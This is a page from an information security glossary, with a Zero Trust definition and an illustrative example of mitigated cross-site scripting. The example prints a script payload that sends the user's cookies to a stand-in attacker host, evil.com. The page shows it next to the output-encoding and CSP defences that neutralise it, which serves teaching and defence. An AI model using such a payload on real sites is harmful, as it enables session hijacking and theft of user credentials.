Reference Tool
Information Security Glossary
Every term, acronym, and concept from the Information Security Hub — defined clearly, connected to related ideas, and tagged by difficulty level.
Results for:
# MITIGATED — output encoding + Content Security Policy header
Response Header: Content-Security-Policy: default-src 'self'; script-src 'self'
Response Body: Results for: <script>document.location='https://evil.com/steal?c='+document.cookie</script>
# Encoded output renders as plain text; CSP blocks inline script execution

Zero Trust
Difficulty: Intermediate
Category: Defenses
Also known as: Zero Trust Architecture, ZTA
Definition: A security model based on the principle of 'never trust, always verify.' Zero Trust assumes no implicit trust based on network location — every access request is fully authenticated, authorized, and encrypted regardless of whether it originates inside or outside the network perimeter. NIST SP 800-207 defines the architecture. Key tenets: verify explicitly, use least-privilege access, and assume breach.
Related terms: least-privilege, mfa, defense-in-depth, access-control, network-segmentation, vpn
Authority: https://csrc.nist.gov/glossary/term/zero_trust